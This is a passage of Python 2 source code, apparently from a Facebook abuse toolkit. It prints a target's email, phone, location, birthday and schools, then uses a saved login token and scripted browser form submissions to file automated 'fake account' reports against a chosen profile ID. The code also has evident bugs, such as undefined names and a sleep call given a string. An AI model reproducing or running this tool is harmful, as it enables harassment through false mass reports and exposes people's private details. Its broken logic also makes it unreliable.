			except KeyError: print '\033[1;97m[?] \033[1;97mEmail\033[1;97m         : \033[1;91mNot found'
			try:
				print '\033[1;97mTelephone\033[1;97m     : '+z['mobile_phone']
			except KeyError: print '\033[1;97mTelephone\033[1;97m     : \033[1;91mNot found'
			try:
				print '\033[1;97mLocation\033[1;97m      : '+z['location']['name']
			except KeyError: print '\033[1;97mLocation\033[1;97m      : \033[1;91mNot found'
			try:
				print '\033[1;97mDate of birth\033[1;97m : '+z['birthday']
			except KeyError: print '\033[1;97mDate of birth\033[1;97m : \033[1;91mNot found'
			try:
				print '\033[1;97mSchool\033[1;97m        : '
				for q in z['education']:
					try:
						print '\033[1;97m                   ~ \033[1;97m'+q['school']['name']
					except KeyError: print '\033[1;91m                   ~ \033[1;91mNot found'
			except KeyError: pass
			raw_input("\n\033[1;97m[ \033[1;97mBack \033[1;97m]")
			asif()
		else:
			pass
	else:
		print"\033[1;91m User not found"
		raw_input("\n\033[1;97m[ \033[1;97mBack \033[1;97m]")
		menu()

def fighter():
	global toket
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\x1b[1;91mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	os.system('clear')
	print logo23
	print "1.\x1b[1;97mTarget Profile.  "
        time.sleep(0.05)
        print "2.\x1b[1;97m Start  Reporting."
        time.sleep(0.05)
        print "3.\x1b[1;97m Start  Report1.  "
        time.sleep(0.05)
        print "4.\x1b[1;97m Start  Report2.  "
        time.sleep(0.05)
        print "5.\x1b[1;97m Start  Report3.  "
        time.sleep(0.05)
        print "6.\x1b[1;97mStart  Report4.  "
        time.sleep(0.05)
	print "0.\033[1;97mBack             "
	pilih_fighter()

def pilih_fighter():
	peak = raw_input("\n\033[1;97mEnter Number ---- \033[1;97m")
	if peak =="":
		print "\x1b[1;91mFill in correctly"
		pilih_fighter()
	elif peak =="1":
		report()
        elif peak =="2":
	        rep()
        elif peak =="3":
                test1()
        elif peak =="4":
	        test2()
        elif peak =="5":
	        test3()
        elif peak =="6":
	        test4()
	elif peak =="0":
		menu()
def report():
    try:
        os.system('clear')
        print logo3
        id = raw_input(R+'[+]'+G+' Enter Target Id: '+W)
        my = ("https://m.facebook.com/"+id)
        url = my
        br.open(url)
        dray = raw_input(R+'[*] '+G+'Do You Want To Report \n'+R+'[+]'+G+' [y/n] :\n'+ G +' Qaiser ' + R + '  ' + W)
        return rep()    
    except:
        fighter()
def rep():
    x = open(ids,'r')
    y = x.read()
    if id in y:
        print (R+'.  Oops 405')
        time.sleep(1)
        time.sleep(R+'Error While Reporting the Id')
        time.sleep(1)
        return test1()
    else:         
        return test2()
               
def test1():
          _bs = br.response().read()
          bb=bs4.BeautifulSoup(_bs,
				features="html.parser"
			)
          if len(bb) !=0:              
              for x in bb.find_all("a",href=True):                  
                  if "rapid_report" in x["href"]:                      
                      _cadow = x["href"]                      
                      br.open(_cadow)
                      return test2()
          
def test2():
    try:
        br._factory.is_html=True
        br.select_form(nr=0)
        br.form["tag"] = ["profile_fake_account"]
        br.submit()
        return test3()
    except Exception as f:
        print (' [+] Bad404')
                
def test3():     
    try:         
        br._factory.is_html=True
        br.select_form(nr=0)
        br.form["action_key"] = ["FRX_PROFILE_REPORT_CONFIRMATION"]
        br.submit()
        return _test4()
    except Exception as f:         
        print ('    Bad405')
                 
def test4():     
    try:         
        br._factory.is_html=True
        br.select_form(nr=0)
        br.form["checked"] = ["yes"]
        br.submit()
        jj = open(ids,'w')
        jj.write(_id)
        print ''
        time.sleep(2)
        print (G+'[-]Reported ')
        time.sleep(1)
        exit()
    except Exception as f:         
        print ('    Bad406')
		
          
if __name__ == '__main__':
	login()
